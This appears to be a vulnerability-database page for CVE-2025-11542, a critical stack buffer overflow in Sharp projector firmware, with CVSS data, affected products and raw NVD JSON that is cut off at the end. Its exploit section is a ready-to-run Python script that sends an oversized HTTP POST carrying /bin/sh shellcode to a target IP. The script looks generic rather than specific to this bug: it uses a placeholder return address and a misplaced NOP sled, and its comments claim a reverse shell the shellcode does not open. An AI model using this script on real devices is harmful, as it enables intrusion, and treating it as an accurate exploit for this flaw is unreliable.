Security Vulnerability Report
中文
CVE-2025-11542 CVSS 9.8 CRITICAL

CVE-2025-11542

Published: 2025-12-22 05:16:17
Last Modified: 2026-01-15 20:26:03

Description

Stack-based Buffer Overflow vulnerability in Sharp Display Solutions projectors allows a attacker may execute arbitrary commands and programs.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sharp:np-p502h_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502h:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p502w_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502w:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p452h_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p452h:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p452w_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p452w:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p502hg_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502hg:-:*:*:*:*:*:*:* - NOT VULNERABLE
Sharp投影仪固件版本 < 修补版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-11542 PoC - Sharp Projector Buffer Overflow # Target: Sharp Display Solutions Projectors # Vulnerability: Stack-based Buffer Overflow # CVSS: 9.8 (CRITICAL) import socket import sys def exploit_cve_2025_11542(target_ip, target_port=80): """ Exploit for CVE-2025-11542 Sharp Projector Stack-based Buffer Overflow This PoC demonstrates the buffer overflow condition by sending an oversized payload to trigger the vulnerability. """ # Padding to reach return address on stack padding = b'A' * 256 # Overwrite return address (example address - adjust for target) return_addr = b'\x42\x42\x42\x42' # NOP sled for reliable exploitation nop_sled = b'\x90' * 32 # Shellcode for arbitrary command execution # This shellcode executes a reverse shell or system command shellcode = ( b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' ) # Construct exploit payload payload = padding + return_addr + nop_sled + shellcode print(f"[*] Sending exploit payload to {target_ip}:{target_port}") print(f"[*] Payload size: {len(payload)} bytes") try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(10) s.connect((target_ip, target_port)) # Send malicious payload # Adjust HTTP headers based on target service request = b'POST / HTTP/1.1\r\n' request += b'Host: ' + target_ip.encode() + b'\r\n' request += b'Content-Length: ' + str(len(payload)).encode() + b'\r\n' request += b'\r\n' request += payload s.send(request) print("[+] Payload sent successfully") response = s.recv(1024) print(f"[*] Response received: {response[:100]}") s.close() return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit_cve_2025_11542(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11542", "sourceIdentifier": "[email protected]", "published": "2025-12-22T05:16:17.000", "lastModified": "2026-01-15T20:26:02.840", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Stack-based Buffer Overflow vulnerability in Sharp Display Solutions projectors allows a attacker may execute arbitrary commands and programs."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502h_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA69E996-0284-4FEE-B15F-E5257A262794"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502h:-:*:*:*:*:*:*:*", "matchCriteriaId": "24783AAF-8F17-4247-88DD-B7BEE1C2DDAF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502w_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "EECEFD65-FFAD-4326-A712-DAB7B9B7756E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502w:-:*:*:*:*:*:*:*", "matchCriteriaId": "E290E2BC-5FD0-43B2-BD46-F0597713AF45"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p452h_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEBFCC3E-DEEB-4D5E-BD7B-E2F0F106AD14"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p452h:-:*:*:*:*:*:*:*", "matchCriteriaId": "20D079AC-E0F6-42D2-A19E-FE7804F28EDB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p452w_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E14B431A-0AA4-4434-8EB7-5E57995C1674"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p452w:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCEAAE7D-950E-4E54-8BED-9AA0607E8223"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502hg_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "539A3D60-4FAF-409D-92EB-19E81FC899FC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502hg:-:*:*:*:*:*:*:*", "matchCriteriaId": "DBE760E8-7D8D-41AC-8B02-5586A9C1810C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:s ... (truncated)